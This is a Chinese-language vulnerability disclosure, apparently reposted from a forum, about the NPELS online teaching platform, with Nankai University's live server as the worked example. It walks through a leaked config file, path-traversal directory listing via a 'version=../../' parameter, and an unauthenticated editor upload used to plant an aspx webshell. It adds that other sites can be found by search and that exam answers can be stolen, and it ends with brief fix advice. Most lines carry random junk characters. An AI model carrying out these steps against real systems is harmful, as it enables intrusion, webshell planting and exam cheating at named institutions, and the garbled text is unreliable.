好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
4 ^7 @' X" E" }# S. w! M9 u
9 H" g. ^( E3 y$ ]( H详细说明:
8 q) F4 Y/ O& N% \" K9 j" o$ t
! |7 K- t0 P6 R; q以南开大学的为例:
9 ?# [7 g. p! u6 J( q Shttp://222.30.60.3/NPELS
8 I4 v7 U+ O1 D7 c0 [NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址1 V" O% l& ? S e8 g- e6 s0 u& }
<setting name="Update_CommonSvr_CommonService" serializeAs="String">% s% d7 t0 x( s
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
. w+ S4 D" t5 J; h! a: a, {</setting>: }4 y4 t2 F8 D$ k
及版本号
% I2 G: ~6 n$ Q9 n8 }<add key="TVersion" value="1, 0, 0, 2187">
% Y; h! [2 L1 q+ Y, g</add>8 E) }, s5 N- U m+ M7 `! c9 _
直接访问
/ w9 s h* a$ D) lhttp://222.30.60.3/NPELS/CommonService.asmx+ B8 H" f* T* s9 }1 n' H, w
使用GetTestClientFileList操作,直接 HTTP GET 列目录:
0 C, d2 c5 |$ H5 r" Z3 t8 Qhttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
1 U3 E% v2 ?' W2 C, H5 {: D进一步列目录(返回的网页很大,可以直接 wget 下来)4 C" ^+ G7 H. ~8 D @* U) a9 \2 E0 O
http://222.30.60.3/NPELS/CommonS ... List?version=../../
# r3 \9 `6 c( x* o 7 E0 c$ E6 ` G* z3 T: i/ Y
发现
$ h6 N; R. @- O9 rhttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
" D3 u% R/ @8 I9 |* `可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头& v, t* Z5 v' _# j
上传后继续列目录找到木马地址直接访问即可
3 F" l% o F8 t' b5 W' O 9 y, R4 R; V. B' v, J/ y' |& k
OOXX; D O9 u0 A4 s$ s5 u0 Z. |
2 U8 w" b! r6 j1 N
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
+ ?/ S* P# V0 N/ r" T, Y5 ^- X漏洞证明:
8 A, [9 Y+ S0 Z( F" s
* y! H) I$ @ c9 Y' J列目录:- K6 w' A6 y$ q7 z# I+ q: l
http://222.30.60.3/NPELS/CommonS ... List?version=../..// [2 i1 g6 j- l( |
文件上传:
$ v; z( q) V- c! _& M- d/ thttp://222.30.60.3/npelsv/editor/editor.htm7 ]- Z2 E) @* q. F, F5 V
. x& n- a) @5 w* s7 f% r
上传木马:/ d& v; U3 e; e" D; U2 N, q
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
. Z$ P( x, l9 b) q
! e$ w# X0 N2 f/ e修复方案:
" [, } S7 U$ f好像考试系统必须使用 CommonService.asmx
' V( X+ _0 }, U最好配置文件加密或者用别的方式不让它泄露出来+ d* n4 c6 }4 j
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样 w3 {# [7 g/ v/ d V
|